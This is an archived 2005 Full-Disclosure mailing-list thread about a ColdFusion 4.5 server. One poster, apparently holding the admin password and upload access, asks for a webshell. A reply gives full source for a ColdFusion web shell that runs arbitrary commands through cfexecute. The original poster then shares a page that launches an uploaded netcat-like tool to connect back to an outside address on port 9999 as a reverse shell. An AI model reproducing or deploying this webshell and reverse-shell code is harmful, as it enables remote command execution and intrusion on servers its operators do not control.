[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] coldfusion pentest
- To: "Javier Reoyo" <javier.reoyo@xxxxxxxxxxxxxxxxx>
- Subject: Re: [Full-disclosure] coldfusion pentest
- From: "fatb" <fatb@xxxxxxxxxxxxxxxxx>
- Date: Tue, 10 May 2005 17:19:59 +0800
thx :)
the script from securiteam was from Kurt Grutzmacher originally,it could not
run in my box
and Im successful got a working shell by uploading a nc like tool and use the
following script to run it
<html>
<body>
<cfexecute name="D:\haha.exe"
arguments="-connect 1.1.1. 9999"
timeout="20">
</cfexecute>
</body>
</html>
no matter how,I thought many guys who like me need a working cf
webshell,because the upload script do not allow us to upload exe or some other
kinds of files
----- Original Message -----
From: "Javier Reoyo" <javier.reoyo@xxxxxxxxxxxxxxxxx>
To: <full-disclosure@xxxxxxxxxxxxxxxxx>
Sent: Tuesday, May 10, 2005 4:31 PM
Subject: Re: [Full-disclosure] coldfusion pentest
> Hi fatb,
>
>
> this is from mailing of securiteam. Try it.
>
> ColdFusion Web Shell
> ------------------------------------------------------------------------
>
>
> SUMMARY
>
>
>
> DETAILS
>
> The following source code will generate a web based shell whenever it is
> executed under the ColdFusion environment.
>
> Tool source code:
> < html>
> < body>
>
> < cfoutput>
> < table>
> < form method="POST" action="cfexec.cfm">
> < tr>
> < td>Command:</td>
> < td> < input type=text name="cmd" size=50< cfif isdefined("form.cmd")>
> value="#form.cmd#" </cfif>> < br></td>
> </tr>
> < tr>
> < td>Options:</td>
> < td> < input type=text name="opts" size=50 < cfif
> isdefined("form.opts")> value="#form.opts#" </cfif> >< br> </td>
> </tr>
> < tr>
> < td>Timeout:</td>
> < td>< input type=text name="timeout" size=4 < cfif
> isdefined("form.timeout")> value="#form.timeout#" < cfelse> value="5"
> </cfif> > </td>
> </tr>
> </table>
> < input type=submit value="Exec" >
> </FORM>
>
> < cfsavecontent variable="myVar">
> < cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout =
> "#Form.timeout#">
> </cfexecute>
> </cfsavecontent>
> < pre>
> #myVar#
> </pre>
> </cfoutput>
> </body>
> </html>
>
>
> ADDITIONAL INFORMATION
>
> The information has been provided by <mailto:grutz@xxxxxxxxxxxxxx> Kurt
> Grutzmacher.
>
>
>
> ========================================
>
> ----- Original Message -----
> From: "fatb" <fatb@xxxxxxxxxxxxxxxxx>
> To: <pen-test@xxxxxxxxxxxxxxxxx>
> Cc: <full-disclosure@xxxxxxxxxxxxxxxxx>
> Sent: Tuesday, May 10, 2005 4:43 AM
> Subject: [Full-disclosure] coldfusion pentest
>
>
>> Hi all guys
>>
>> I've successed get the admin's passwd of the web interface
>>
>> and I can upload any kinds of files to the server
>>
>> the server is running coldfusion 4.5 with iis 5.0
>>
>> but I can not find a coldfusion webshell to continue
>>
>> anybody could be kind enough to send me a working coldfusion webshell
>>
>> thx in advanced!
>
>
> ----------------------------------------------------------------------------
> ----
>
>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/